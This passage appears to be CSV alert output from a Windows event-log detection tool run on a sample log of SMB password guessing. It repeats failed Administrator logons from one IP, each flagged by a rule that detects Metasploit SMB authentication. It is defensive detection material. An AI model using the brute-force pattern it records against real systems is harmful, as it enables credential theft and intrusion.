SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GVHzJHTi55NbxXYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1FROeEnMLna2fTTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pio6ZZ9pV0pS2Whi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: h1aD2w5U5K9ND5HV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zF8Jb4GpG4D3xn9i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edv4GwGfL156V1xe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Irvneva9RFn44iII : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dHtJFI8OL9kJylL5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F5Q4h62T77hGjhKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdSALwo9td9xUeBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1kYfoqz1r1NuEn04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7X400gufqdunUa8j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lLR8z7g0GY8r7a1r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QHMztrxiKBGtNqkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eBQevVhmZs5gHFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lyQCs0PG6fGzpidu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnsPjnCieyoFIbJZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ku6mjVaG1lCJrAo1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VwiyVIWHOGuHzhdO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92v1rXcj5c0Lt3OF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yO2JYd6FfM2Y7px9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ltr5g8ZWUAdrPKxg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fjiPMy5uOTbbmaQ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: HDRVOzxca9wDJziV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DV28RjUK26Je2Dr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seoetT43w0S3FEss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IdIU9Q9Ig4Bd3Aps : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGzuHSHT59Qnp5jI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPA1J7aQrZ064WSf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhLFXDMUKGfdoc4S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: apVAhc6o3dhLmUll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYMdQeB4ZpFm8xDh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QewW1ISqRdXwtSXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SFhBcgZfc9VZ5S8S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a4ZSRW7F65yDNbJd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HrbzGNYIbjErVtDR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eFcGaL3asLVIF08d : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dhJvIM5PzA9U6GTD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYrfD15TPp8OuST4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8d4CbZSTHhl7fRfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IItrtl1h3PsKviaQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVeoptuwLNKlm0V2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rf6Ri9Lm81mScRt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: NPVkTRUILL5czcbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZJq3kjykwzh0hVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHL4KuirjQ96Dgfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSPjDklMHdW6LqK5 : IP Address: 192.168.198.149 : AuthPackage: 
